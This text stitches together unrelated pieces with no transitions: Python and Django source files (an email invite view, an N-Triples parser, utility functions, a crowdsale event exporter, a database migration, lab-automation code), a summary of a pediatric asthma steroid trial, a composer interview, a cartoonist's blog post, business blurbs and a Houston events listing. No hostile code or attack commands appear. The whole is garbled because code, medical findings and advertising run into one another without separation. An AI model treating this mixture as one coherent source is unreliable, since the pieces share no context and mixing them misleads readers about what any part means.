# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 Clione Software
# Copyright (c) 2010-2013 Cidadania S. Coop. Galega
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.shortcuts import render_to_response
from django.template import RequestContext, loader, Context
from django.contrib.auth.decorators import login_required
from django.utils.translation import ugettext_lazy as _

from e_cidadania import settings


@login_required
def invite(request):
    """
    Simple view to send invitations to friends via mail. Making the
    invitation system as a view guarantees that no invitation will be
    monitored or saved to the hard disk.
    """
    if request.method == "POST":
        mail_addr = request.POST['email_addr']
        raw_addr_list = mail_addr.split(',')
        addr_list = [x.strip() for x in raw_addr_list]
        usr_msg = request.POST['mail_msg']

        plain_template = "invite/invite_plain.txt"
        html_template = "invite/invite.html"

        plain_msg = loader.get_template(plain_template).render(
            RequestContext(request, {'msg': usr_msg}))
        html_msg = loader.get_template(html_template).render(
            RequestContext(request, {'msg': usr_msg}))

        email = EmailMultiAlternatives(_('Invitation to join e-cidadania'),
                                       plain_msg, settings.DEFAULT_FROM_EMAIL,
                                       [], addr_list)
        email.attach_alternative(html_msg, 'text/html')
        email.send(fail_silently=False)
        return render_to_response('invite_done.html',
                                  context_instance=RequestContext(request))

    uri = request.build_absolute_uri("/")
    return render_to_response('invite.html', {"uri": uri},
                              context_instance=RequestContext(request))
Am Fam Physician. 2001 Mar 15;63(6):1203-1204. Acute exacerbation of asthma is one of the most common medical reasons for emergency department visits in children. In this setting, standard therapy consists of supplemental oxygen, inhaled beta2-adrenergic agonists, anticholinergic agents and, usually, systemic corticosteroids. Corticosteroids, whether oral or inhaled, have been shown to decrease hospitalizations and prevent progression of symptoms in children with acute asthma. Because of concerns about the safety of repeated doses of systemic steroids, there has been a growing trend toward the use of inhaled steroids as an alternative therapy. However, the data to support this practice are limited. Schuh and colleagues performed a study to compare the efficacy of inhaled fluticasone with oral prednisone in children with severe acute asthma. Children enrolled in the study were seen in a pediatric emergency department with a diagnosis of acute asthma. The children were at least five years of age and had a forced expiratory volume in one second (FEV1) of less than 60 percent of the predicted value. Children were excluded who had not previously wheezed, who had received oral prednisone within the past seven days or who had already taken regular doses of inhaled corticosteroids. Eligible children were randomized to receive a single 2-mg dose of inhaled fluticasone (via an inhaler with a spacer) or oral prednisone syrup in a dosage of 2 mg per kg. Placebo inhalers and syrup were used as well. In addition, all children received five doses of nebulized albuterol. Ipratropium bromide was added to the first three doses of albuterol. Parents of the children who responded to the initial therapies were instructed to continue giving the inhaled steroid or prednisone for an additional seven days after discharge. The parents of all children were instructed to continue giving albuterol via inhaler four times a day for seven days. 
Children who were persistently in respiratory distress four to five hours after the experimental interventions were admitted to the hospital. The primary outcome of the study was a change in FEV1 from baseline to 240 minutes. Secondary outcomes were the changes in forced vital capacity (FVC), peak expiratory flow rate, respiratory rate, oxygen saturation on room air and rate of hospitalization. In the study, 51 children were randomized to the fluticasone group and 49 to the oral prednisone group. The mean age was nine years, with a range of five to 17 years. The FEV1 increased from baseline to 240 minutes by a mean of 19 percent in the oral steroid group (P <0.001) compared with 9.4 percent in the inhaled steroid group. Thirteen of the children in the oral prednisone group had an “excellent” response (an increase of FEV1 greater than 25 percent) but only five in the inhaled fluticasone group had such a response. In contrast, 16 in the latter group had a “poor” response (an increase in FEV1 of less than 5 percent) compared with just four children taking oral prednisone. Moreover, 25 percent of children in the inhalation therapy group actually had a reduction in baseline FEV1 at 240 minutes, whereas no children in the oral prednisone group showed a decline in FEV1. The FVC and predicted peak expiratory flow rates were also significantly greater in the oral steroid group. Following the study, 16 children (31 percent) in the fluticasone group were admitted to the hospital compared with only five (10 percent) in the prednisone group. The authors conclude that oral prednisone is superior to inhaled fluticasone in the treatment of children with acute exacerbations of asthma. They recommend that inhaled corticosteroids not be used for children in this clinical setting. Schuh S, et al. A comparison of inhaled fluticasone and oral prednisone for children with severe acute asthma. N Engl J Med. September 7, 2000;343:689–94.
#!/usr/bin/env python
__doc__ = """
N-Triples Parser
License: GPL 2, W3C, BSD, or MIT
Author: Sean B. Palmer, inamidst.com
Documentation: http://inamidst.com/proj/rdf/ntriples-doc

Command line usage::

    ./ntriples.py <URI>    - parses URI as N-Triples
    ./ntriples.py --help   - prints out this help message

# @@ fully empty document?
"""

import re

uriref = r'<([^:]+:[^\s"<>]+)>'
literal = r'"([^"\\]*(?:\\.[^"\\]*)*)"'
litinfo = r'(?:@([a-z]+(?:-[a-z0-9]+)*)|\^\^' + uriref + r')?'

r_line = re.compile(r'([^\r\n]*)(?:\r\n|\r|\n)')
r_wspace = re.compile(r'[ \t]*')
r_wspaces = re.compile(r'[ \t]+')
r_tail = re.compile(r'[ \t]*\.[ \t]*')
r_uriref = re.compile(uriref)
r_nodeid = re.compile(r'_:([A-Za-z][A-Za-z0-9]*)')
r_literal = re.compile(literal + litinfo)

bufsiz = 2048
validate = False


class Node(unicode):
    pass

# class URI(Node): pass
# class bNode(Node): pass
# class Literal(Node):
#     def __new__(cls, lit, lang=None, dtype=None):
#         n = str(lang) + ' ' + str(dtype) + ' ' + lit
#         return unicode.__new__(cls, n)

from rdflib.term import URIRef as URI
from rdflib.term import BNode as bNode
from rdflib.term import Literal


class Sink(object):
    def __init__(self):
        self.length = 0

    def triple(self, s, p, o):
        self.length += 1
        print (s, p, o)


class ParseError(Exception):
    pass


quot = {'t': '\t', 'n': '\n', 'r': '\r', '"': '"', '\\': '\\'}
r_safe = re.compile(r'([\x20\x21\x23-\x5B\x5D-\x7E]+)')
r_quot = re.compile(r'\\(t|n|r|"|\\)')
r_uniquot = re.compile(r'\\u([0-9A-F]{4})|\\U([0-9A-F]{8})')


def unquote(s):
    """Unquote an N-Triples string."""
    result = []
    while s:
        m = r_safe.match(s)
        if m:
            s = s[m.end():]
            result.append(m.group(1))
            continue

        m = r_quot.match(s)
        if m:
            s = s[2:]
            result.append(quot[m.group(1)])
            continue

        m = r_uniquot.match(s)
        if m:
            s = s[m.end():]
            u, U = m.groups()
            codepoint = int(u or U, 16)
            if codepoint > 0x10FFFF:
                raise ParseError("Disallowed codepoint: %08X" % codepoint)
            result.append(unichr(codepoint))
        elif s.startswith('\\'):
            raise ParseError("Illegal escape at: %s..." % s[:10])
        else:
            raise ParseError("Illegal literal character: %r" % s[0])
    return unicode(''.join(result))

if not validate:
    def unquote(s):
        return s.decode('unicode-escape')

r_hibyte = re.compile(r'([\x80-\xFF])')


def uriquote(uri):
    return r_hibyte.sub(lambda m: '%%%02X' % ord(m.group(1)), uri)

if not validate:
    def uriquote(uri):
        return uri


class NTriplesParser(object):
    """An N-Triples Parser.

    Usage::

        p = NTriplesParser(sink=MySink())
        sink = p.parse(f)  # file; use parsestring for a string
    """

    def __init__(self, sink=None):
        if sink is not None:
            self.sink = sink
        else:
            self.sink = Sink()

    def parse(self, f):
        """Parse f as an N-Triples file."""
        if not hasattr(f, 'read'):
            raise ParseError("Item to parse must be a file-like object.")

        self.file = f
        self.buffer = ''
        while True:
            self.line = self.readline()
            if self.line is None:
                break
            try:
                self.parseline()
            except ParseError:
                raise ParseError("Invalid line: %r" % self.line)
        return self.sink

    def parsestring(self, s):
        """Parse s as an N-Triples string."""
        if not isinstance(s, basestring):
            raise ParseError("Item to parse must be a string instance.")
        from cStringIO import StringIO
        f = StringIO()
        f.write(s)
        f.seek(0)
        self.parse(f)

    def readline(self):
        """Read an N-Triples line from buffered input."""
        # N-Triples lines end in either CRLF, CR, or LF
        # Therefore, we can't just use f.readline()
        if not self.buffer:
            buffer = self.file.read(bufsiz)
            if not buffer:
                return None
            self.buffer = buffer

        while True:
            m = r_line.match(self.buffer)
            if m:  # the more likely prospect
                self.buffer = self.buffer[m.end():]
                return m.group(1)
            else:
                buffer = self.file.read(bufsiz)
                if not buffer and not self.buffer.isspace():
                    raise ParseError("EOF in line")
                elif not buffer:
                    return None
                self.buffer += buffer

    def parseline(self):
        self.eat(r_wspace)
        if (not self.line) or self.line.startswith('#'):
            return  # The line is empty or a comment

        subject = self.subject()
        self.eat(r_wspaces)

        predicate = self.predicate()
        self.eat(r_wspaces)

        object = self.object()
        self.eat(r_tail)

        if self.line:
            raise ParseError("Trailing garbage")
        self.sink.triple(subject, predicate, object)

    def peek(self, token):
        return self.line.startswith(token)

    def eat(self, pattern):
        m = pattern.match(self.line)
        if not m:  # @@ Why can't we get the original pattern?
            raise ParseError("Failed to eat %s" % pattern)
        self.line = self.line[m.end():]
        return m

    def subject(self):
        # @@ Consider using dictionary cases
        subj = self.uriref() or self.nodeid()
        if not subj:
            raise ParseError("Subject must be uriref or nodeID")
        return subj

    def predicate(self):
        pred = self.uriref()
        if not pred:
            raise ParseError("Predicate must be uriref")
        return pred

    def object(self):
        objt = self.uriref() or self.nodeid() or self.literal()
        if objt is False:
            raise ParseError("Unrecognised object type")
        return objt

    def uriref(self):
        if self.peek('<'):
            uri = self.eat(r_uriref).group(1)
            uri = unquote(uri)
            uri = uriquote(uri)
            return URI(uri)
        return False

    def nodeid(self):
        if self.peek('_'):
            return bNode(self.eat(r_nodeid).group(1))
        return False

    def literal(self):
        if self.peek('"'):
            lit, lang, dtype = self.eat(r_literal).groups()
            lang = lang or None
            dtype = dtype or None
            if lang and dtype:
                raise ParseError("Can't have both a language and a datatype")
            lit = unquote(lit)
            return Literal(lit, lang, dtype)
        return False


def parseURI(uri):
    import urllib
    parser = NTriplesParser()
    u = urllib.urlopen(uri)
    sink = parser.parse(u)
    u.close()
    # for triple in sink:
    #     print triple
    print 'Length of input:', sink.length


def main():
    import sys
    if len(sys.argv) == 2:
        parseURI(sys.argv[1])
    else:
        print __doc__

if __name__ == "__main__":
    main()
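The grammar above is driven entirely by the module-level regular expressions. A small Python 3 sketch exercising those same patterns standalone (the original file targets Python 2; everything here besides the copied patterns is illustrative):

```python
import re

# The same terminal patterns the parser compiles, copied verbatim.
uriref = r'<([^:]+:[^\s"<>]+)>'
literal = r'"([^"\\]*(?:\\.[^"\\]*)*)"'
litinfo = r'(?:@([a-z]+(?:-[a-z0-9]+)*)|\^\^' + uriref + r')?'

r_uriref = re.compile(uriref)
r_literal = re.compile(literal + litinfo)

# A URI reference captures everything between the angle brackets.
m = r_uriref.match('<http://example.org/subject>')
print(m.group(1))  # http://example.org/subject

# A literal with a language tag: group 1 is the lexical form, group 2 the tag.
m = r_literal.match('"chat"@fr')
print(m.group(1), m.group(2))  # chat fr

# A typed literal: the datatype URI lands in group 3.
m = r_literal.match('"42"^^<http://www.w3.org/2001/XMLSchema#integer>')
print(m.group(1), m.group(3))  # 42 http://www.w3.org/2001/XMLSchema#integer
```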
Installation of all work is undertaken by trained and experienced fitters. From acrylic plaques to large fabricated signage, we will ensure that all projects, large or small, are carried out safely, on time and with minimum disruption to your business. Knowledge and use of the correct fixings, adhesives and framing systems are critical for a successful installation. Optima Signs are fully insured, and our fitters hold up-to-date Safe Pass cards and M.E.W.P. (Mobile Elevated Working Platform) operating licenses.
import ctypes
import os
import random
import sqlite3
import threading
from contextlib import closing
from decimal import ROUND_HALF_UP, Decimal
from pathlib import Path

import numexpr

import Data


class DescriptiveError(Exception):
    pass


def tuple_overlap(a: tuple, b: tuple) -> bool:
    """Checks if the first two elements of the tuples overlap on the
    numberline/other ordering."""
    a, b = sorted(a), sorted(b)
    return (
        b[0] <= a[0] <= b[1]
        or b[0] <= a[1] <= b[1]
        or a[0] <= b[0] <= a[1]
        or a[0] <= b[1] <= a[1]
    )


def terminate_thread(thread: threading.Thread):
    """Terminates a python thread from another thread.

    :param thread: a threading.Thread instance
    """
    if not thread.is_alive():
        return

    exc = ctypes.py_object(SystemExit)
    res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(thread.ident), exc)
    if res == 0:
        raise ValueError("nonexistent thread id")
    if res > 1:
        # """if it returns a number greater than one, you're in trouble,
        # and you should call it again with exc=NULL to revert the effect"""
        ctypes.pythonapi.PyThreadState_SetAsyncExc(thread.ident, None)
        raise SystemError("PyThreadState_SetAsyncExc failed")


def init_db():
    print("initializing DB")
    with closing(connect_db("initialization")) as db:
        db.cursor().executescript(Data.getschema())
        db.commit()


def calculate(calc, par=None):
    loose_par = [0]  # last pop ends the loop
    if par is None:
        par = {}
    else:
        loose_par += [x for x in par.split(",") if ":" not in x]
        par = {
            x.upper(): y
            for x, y in [pair.split(":") for pair in par.split(",") if ":" in pair]
        }
    for k, v in par.items():
        calc = calc.replace(k, v)
    calc = calc.strip()
    missing = None
    res = 0
    while len(loose_par) > 0:
        try:
            res = numexpr.evaluate(calc, local_dict=par, truediv=True).item()
            missing = None  # success
            break
        except KeyError as e:
            missing = e
            par[e.args[0]] = float(loose_par.pop())  # try autofilling
    if missing:
        raise DescriptiveError("Parameter " + missing.args[0] + " is missing!")
    return Decimal(res).quantize(1, ROUND_HALF_UP)


g = {}  # module level caching


def close_db():
    db = g.get("db", None)
    if db:
        db.close()
    g["db"] = None


def connect_db(source) -> sqlite3.Connection:
    """db connection singleton"""
    db = g.get("db", None)
    if db:
        return db
    dbpath = Data.DATABASE
    if source != "before request":
        print("connecting to", dbpath, "from", source)
    if not Path(dbpath).exists():
        Path(dbpath).touch()
        init_db()
    g["db"] = sqlite3.connect(dbpath)
    return g["db"]


def write_nonblocking(path, data):
    path = Path(path)
    if path.is_dir():
        path = path / "_"
    i = 0
    while (path.with_suffix(f".{i}")).exists():
        i += 1
    with path.with_suffix(f".{i}").open(mode="x") as x:
        x.write(data + "\n")
        x.write("DONE")  # mark file as ready


def read_nonblocking(path):
    path = Path(path)
    if path.is_dir():
        path = path / "_"
    result = []
    file: Path
    for file in sorted(path.parent.glob(str(path.stem) + "*")):
        with file.open(mode="r") as f:
            lines = f.readlines()
        if lines[-1] != "DONE":
            break  # file not read yet or fragmented
        result += lines[:-1]
        os.remove(str(file.absolute()))
    return result


def is_int(s: str) -> bool:
    try:
        int(s)
        return True
    except ValueError:
        return False


def sumdict(inp):
    result = 0
    try:
        for e in inp.keys():
            result += int(inp[e])
    except Exception:
        result = sum(inp)
    return result


def d10(amt, diff, ones=True):  # faster than the Dice
    succ = 0
    anti = 0
    for _ in range(amt):
        x = random.randint(1, 10)
        if x >= diff:
            succ += 1
        if ones and x == 1:
            anti += 1
    if anti > 0:
        if succ > anti:
            return succ - anti
        if succ > 0:
            return 0
        return 0 - anti
    return succ


def split_at(a, x):
    return a[:x], a[x:]
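`tuple_overlap` treats each 2-tuple as a closed interval, sorting each pair first so argument order within a tuple doesn't matter. A self-contained sketch of the same logic with its edge cases spelled out:

```python
def tuple_overlap(a: tuple, b: tuple) -> bool:
    # Same interval-overlap test as above: sort each pair so (lo, hi) order
    # doesn't matter, then check whether either interval's endpoint falls
    # inside the other interval.
    a, b = sorted(a), sorted(b)
    return (
        b[0] <= a[0] <= b[1]
        or b[0] <= a[1] <= b[1]
        or a[0] <= b[0] <= a[1]
        or a[0] <= b[1] <= a[1]
    )

print(tuple_overlap((1, 5), (4, 8)))   # True  - ranges share [4, 5]
print(tuple_overlap((5, 1), (4, 8)))   # True  - order within a tuple is irrelevant
print(tuple_overlap((1, 3), (3, 8)))   # True  - touching endpoints count as overlap
print(tuple_overlap((1, 3), (4, 8)))   # False - disjoint
print(tuple_overlap((1, 10), (4, 5)))  # True  - containment counts too
```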
Which is probably a good thing in this case, or else people would think that Gralen and Jessy were a couple of rude buttheads. But, as I stated in my previous post concerning my older cartoons (The Way Back Machine), a lot of the “punchlines” were simply the main character or characters laughing at the guest character’s predicament or… the way that they talk. They are certainly not trying to be rude. They are like children, and when children see, or hear, something funny, they laugh. If you take it as coming from a young boy with a weird imagination who grew up during a time when political correctness wasn’t even on the radar, maybe you can laugh along with him (and them). Another thing you will notice about some of these older cartoons of mine is that I used to make title pages for them (forgot I even did that) and would introduce the characters who were in that day’s cartoon. Note that Jessy in this one is described as Gralen’s little brother instead of being Gralen’s son, as in more recent episodes (already posted here). The names would jump around with some characters, as you will see in future postings. I think the only one who kept his name with his character was Gralen. He was always the same dinosaur and always the lead.
"""Extract crowdsale raw investmetn data.""" import csv import datetime import click from eth_utils import from_wei from populus import Project @click.command() @click.option('--chain', nargs=1, default="mainnet", help='On which chain to deploy - see populus.json') @click.option('--address', nargs=1, help='CrowdsaleContract address to scan', required=True) @click.option('--csv-file', nargs=1, help='CSV file to write', default=None, required=True) def main(chain, address, csv_file): """Extract crowdsale invested events. This is useful for RelaunchCrowdsale to rebuild the data. """ project = Project() with project.get_chain(chain) as c: web3 = c.web3 print("Web3 provider is", web3.currentProvider) # Sanity check print("Block number is", web3.eth.blockNumber) Crowdsale = c.provider.get_base_contract_factory('MintedTokenCappedCrowdsale') crowdsale = Crowdsale(address=address) print("Total amount raised is", from_wei(crowdsale.call().weiRaised(), "ether"), "ether") print("Getting events") events = crowdsale.pastEvents("Invested").get(only_changes=False) print("Writing results to", csv_file) with open(csv_file, 'w', newline='') as out: writer = csv.writer(out) writer.writerow(["Address", "Payment at", "Tx hash", "Tx index", "Invested ETH", "Received tokens"]) for e in events: timestamp = web3.eth.getBlock(e["blockNumber"])["timestamp"] dt = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc) writer.writerow([ e["args"]["investor"], dt.isoformat(), e["transactionHash"], e["transactionIndex"], from_wei(e["args"]["weiAmount"], "ether"), e["args"]["tokenAmount"], ]) print("Total", len(events), "invest events") print("All done! Enjoy your decentralized future.") if __name__ == "__main__": main()
Tonight’s Prom includes a short orchestral work by US composer Andrew Norman, titled Spiral. Here are his answers to my pre-première questions, together with the programme note for the piece. Many thanks to Andrew for his responses. 1. For anyone not yet familiar with it, could you give a brief summary of your music, i.e. characteristics, outlook, aesthetic, etc.? Such a tough question!! I write music that is often about the process (or struggle) of making something. I think the best ideas in my pieces are trying to form themselves in real time, they are trying to become something as they go. I don’t like to present material so much as unleash it in an unformed state and watch it find its true self. I love the idea that a piece of music can be like tracing a thought through a brain. Sometimes that thought’s journey is focused and sustained, and other times it is filled with non-sequiturs, wrong turns, and crazy tangents. A lot of my music explores the rhetoric of juxtaposition, jump cuts, and fragmentation. Ideas are chopped into little pieces and made to jostle around with each other, constantly reframing and intercutting each other. I tend toward timbres that are on the rough and raw end of the spectrum, and I especially love using these sounds not as a replacement for traditionally beautiful sounds, but as a foil, or an expansion, of them. My music is often highly kinetic, and it relies heavily on the physicality, the visual theatre, of instrumental playing for its full effect. I really believe in live instrumental performance, and there are aspects to many of my pieces which can’t be gleaned from a recording (my apologies to the radio audience!). 2. What led to you becoming a composer? Did/does it feel like a choice? I’ve been a performer since I was a child, and I played in orchestra all throughout school. Writing music felt like a natural extension of my activities as a musician when I was younger. 
As I’ve gotten older, writing has definitely gotten harder, and a lot less natural-feeling, but I keep at it in hopes that someday I will stumble onto something of which I can be proud. 3. Where did you study? Who/what have been the most important influences on your work? I studied at the University of Southern California and at Yale. I’ve had some amazing teachers, including Donald Crockett, Stephen Hartke, Aaron Kernis and Martin Bresnick. 4. How do you go about writing a new piece? To what extent do you start with a ‘blank slate’ and/or use existing methods/materials? Starting a new piece is always dreadful for me. I feel lost for a really long time. I feel like I’ve forgotten how to write music, and that I may never be able to do it again. Sometimes in this lost state I sketch random fragments of musical ideas. Sometimes I improvise on the viola and the piano, usually thinking about a particular physical gesture as a starting point. I work in a really non-linear, fragmented, aimless way for a long time. Usually what happens is that at a certain point, months and months later, something falls into place, some small connection between sounds or ideas, that allows me to begin to make sense and shape of what I’m doing. More connections become clear, and at the last possible moment (or just past it) everything – the sounds, the forms, the conceits – falls into some semblance of place and I have a piece. And then after the first performance, when I know more about what I’ve done, I go back and rewrite everything. 5. How does the piece sit in relation to your previous work? Why did you particularly compose this piece at this time? Spiral explores some themes that I return to often in my work: organic growth, gradual accretion, the slow formation of a musical thought through repetition, the compression and expansion of time, the relationship of physical gesture to expression in string playing, and the spatialization of sound within a traditional orchestra. 
Spiral is what I like to call a one-idea piece. Like the third movement of Play or the last movement of The Companion Guide to Rome, it really is about the gradual formation of one single thing. I was trying to capture the sense of watching something slowly come into, and then perhaps move past, focus. Or perhaps it is the idea of zooming out on a fractal, or of regarding one’s receding selves in a multi-sided mirror chamber. As with a lot of my work, Escher-esque geometries are not too far buried beneath the surface. Practically speaking, Spiral exists because I was asked by Simon Rattle to write a five-minute orchestral piece for one of his last concerts as music director of the Berlin Philharmonic. I knew I wanted to create a single big shape with my five minutes of Philharmonic time, and Spiral is the result. 6. If people really like your piece, what other music of yours would you recommend they check out? There are nice recordings of my pieces Play, Switch, and The Companion Guide to Rome available commercially. But I am always a little reticent to recommend my recordings – not because the players and the performances aren’t spectacular and compelling (they are), but more because I make music for live performance, and a recording for me is only an artifact, a documentation, of a particular experience, and not the experience itself. Go see it live! I’m very late on a big piece for the Los Angeles Philharmonic, and on a cello concerto for Johannes Moser. Commissioned by the Berlin Philharmonic to be part of Simon Rattle’s final season with that orchestra, Spiral is a short piece that traces the transformations of a small number of instrumental gestures as they orbit each other in ever-contracting circles.
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Removing M2M table for field references on 'Message'
        db.delete_table('django_mailbox_message_references')

    def backwards(self, orm):
        # Adding M2M table for field references on 'Message'
        db.create_table('django_mailbox_message_references', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('from_message', models.ForeignKey(orm['django_mailbox.message'], null=False)),
            ('to_message', models.ForeignKey(orm['django_mailbox.message'], null=False))
        ))
        db.create_unique('django_mailbox_message_references', ['from_message_id', 'to_message_id'])

    models = {
        'django_mailbox.mailbox': {
            'Meta': {'object_name': 'Mailbox'},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'uri': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'})
        },
        'django_mailbox.message': {
            'Meta': {'object_name': 'Message'},
            'body': ('django.db.models.fields.TextField', [], {}),
            'from_header': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_reply_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'replies'", 'null': 'True', 'to': "orm['django_mailbox.Message']"}),
            'mailbox': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messages'", 'to': "orm['django_mailbox.Mailbox']"}),
            'message_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'outgoing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'processed': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'subject': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'to_header': ('django.db.models.fields.TextField', [], {})
        }
    }

    complete_apps = ['django_mailbox']
Having a hard time looking for a Film Lab? The LomoLab offers development, scanning and printing of all 35mm, 110 and 120 films. Whatever kind of film development you're after, you'll find it here! Now, you can confidently shoot from the hip without having to worry where to develop those film rolls! This section is exclusively for LomoLab Services in USA and Canada. Got questions about the LomoLab? Check out our LomoLab FAQ. Develop and transfer your Lomokino movie into a Digital Version. Develop, scan and print your Panoramic Pictures with our lab experts. Develop, scan and print your Super Panoramic Pictures shot with your Spinner 360º or any other film camera. Leave your 35mm, 110mm or medium format in our expert hands for development, scans and prints.
""" This file is part of the TheLMA (THe Laboratory Management Application) project. See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information. Creator for library creation ISO jobs. """ from thelma.tools.semiconstants import \ get_rack_specs_from_reservoir_specs from thelma.tools.semiconstants import get_item_status_future from thelma.tools.semiconstants import get_reservoir_specs_standard_384 from thelma.tools.semiconstants import get_reservoir_specs_standard_96 from thelma.tools.iso.libcreation.base import LibraryLayout from thelma.tools.iso.libcreation.base import NUMBER_SECTORS from thelma.tools.iso.libcreation.base import \ DEFAULT_ALIQUOT_PLATE_CONCENTRATION from thelma.tools.iso.libcreation.base import \ DEFAULT_PREPARATION_PLATE_CONCENTRATION from thelma.tools.iso.libcreation.base import \ LibraryBaseLayoutConverter from thelma.tools.iso.poolcreation.base import \ StockSampleCreationPosition from thelma.tools.iso.poolcreation.jobcreator import \ StockSampleCreationIsoJobCreator from thelma.tools.iso.poolcreation.jobcreator import \ StockSampleCreationIsoPopulator from thelma.tools.utils.racksector import QuadrantIterator from thelma.tools.utils.racksector import \ get_sector_layouts_for_384_layout __docformat__ = 'reStructuredText en' __all__ = ['LibraryCreationIsoJobCreator', 'LibraryCreationIsoPopulator', ] class LibraryCreationIsoPopulator(StockSampleCreationIsoPopulator): #: The label pattern for preparation plates. PREP_PLATE_LABEL_PATTERN = '%s-%i-%inM-Q%i' #: The label pattern for aliquot plates. ALIQUOT_PLATE_LABEL_PATTERN = '%s-%i-%inM-%i' def __init__(self, iso_request, number_isos, **kw): StockSampleCreationIsoPopulator.__init__(self, iso_request, number_isos, **kw) #: The library base layout. self.__base_layout = None #: Maps sector indices -> positions. 
self.__sector_positions = None def reset(self): StockSampleCreationIsoPopulator.reset(self) self.__base_layout = None self.__sector_positions = None @property def _base_layout(self): if self.__base_layout is None: lib = self.iso_request.molecule_design_library converter = LibraryBaseLayoutConverter(lib.rack_layout, parent=self) self.__base_layout = converter.get_result() return self.__base_layout @property def _sector_positions(self): if self.__sector_positions is None: self.__sector_positions = \ QuadrantIterator.sort_into_sectors(self._base_layout, NUMBER_SECTORS) return self.__sector_positions def _create_iso_layout(self): layout = LibraryLayout.from_base_layout(self._base_layout) for positions in self._sector_positions.values(): if not self._have_candidates: break for base_pos in positions: if not self._have_candidates: break lib_cand = self._pool_candidates.pop(0) lib_pos = \ StockSampleCreationPosition(base_pos.rack_position, lib_cand.pool, lib_cand.get_tube_barcodes()) layout.add_position(lib_pos) return layout def _populate_iso(self, iso, layout): StockSampleCreationIsoPopulator._populate_iso(self, iso, layout) # Create sector preparation plates. library_name = self.iso_request.label ir_specs_96 = get_reservoir_specs_standard_96() plate_specs_96 = get_rack_specs_from_reservoir_specs(ir_specs_96) ir_specs_384 = get_reservoir_specs_standard_384() plate_specs_384 = get_rack_specs_from_reservoir_specs(ir_specs_384) future_status = get_item_status_future() sec_layout_map = get_sector_layouts_for_384_layout(layout) # Create preparation plates. for sec_idx in range(NUMBER_SECTORS): if not sec_idx in sec_layout_map: continue # TODO: Move label creation to LABELS class. 
prep_label = self.PREP_PLATE_LABEL_PATTERN \ % (library_name, iso.layout_number, DEFAULT_PREPARATION_PLATE_CONCENTRATION, sec_idx + 1) prep_plate = plate_specs_96.create_rack(prep_label, future_status) sec_layout = sec_layout_map[sec_idx] iso.add_sector_preparation_plate(prep_plate, sec_idx, sec_layout.create_rack_layout()) # Create aliquot plates. for i in range(self.iso_request.number_aliquots): # TODO: Move label creation to LABELS class. aliquot_label = self.ALIQUOT_PLATE_LABEL_PATTERN \ % (library_name, iso.layout_number, DEFAULT_ALIQUOT_PLATE_CONCENTRATION, i + 1) aliquot_plate = plate_specs_384.create_rack(aliquot_label, future_status) iso.add_aliquot_plate(aliquot_plate) class LibraryCreationIsoJobCreator(StockSampleCreationIsoJobCreator): _ISO_POPULATOR_CLASS = LibraryCreationIsoPopulator
It was a pleasant surprise to see The Humans, Stephen Karam's Tony-studded portrait of intergenerational squabbles around the Thanksgiving dinner table, on the Alley's season this year. Karam's drama has quietly surprised critics far and wide as a prescient portrait of family amid the specter of American decline. Our review won't run 'til next week, but we're still comfortable recommending it on reputation alone. Tickets from $26. Alley Theatre, 615 Texas Ave. 713-220-5700. More info and tickets at alleytheatre.org. Ten high-flying dogs will be competing for your attention in this "canine cabaret," replete with Frisbee shenanigans and tricks from the likes of Feather, the world's highest-jumping dog. Fair warning: You'll have to put up with their two human handlers, too. Tickets from $45. Jones Hall, 615 Louisiana St. 713-22-4772. More info and tickets at spahouston.org. There's something special about the former first lady's recent memoir that tells a story that's equal parts bracing, inspiring, and instructive—one that the New York Times described as "a study in what happens when the ways we see ourselves don't always line up with the ways that society sees us." Join America's most-admired woman (per Gallup) as she rides the wave of her sold-out stadium book tour. Maybe she'll even roll up in that oh-so-famous pair of boots. Re-sale prices vary. Toyota Center, 1510 Polk St. Tickets available via Stubhub. The Houston Chronicle recently asked "Is the rodeo ready for Cardi B?" Based on the fact that the "Bodak Yellow" rapper's tickets sold out in 40 minutes flat—faster than even George Strait himself—we'd say the answer is a resounding yes. It's still unclear how the notoriously raunchy artist will manage to perform an all-clean set, but given the 26-year-old's ever growing star power, we're excited to see what happens. There's still time to pick up seats on the re-sale market—act quick. Re-sale prices vary. NRG Stadium, NRG Pkwy. More info and tickets at axs.com. 
We've loved this strip-mall tiki bar since the beginning as a charming, if quirky, place to quaff inventive cocktails from equally inventive barware. Sunday's birthday party celebrates half a decade with live music and special tiki mugs for sale. See you on the back patio? Free. Lei Low, 6412 N Main St. 713-380-2968. More info via Facebook.
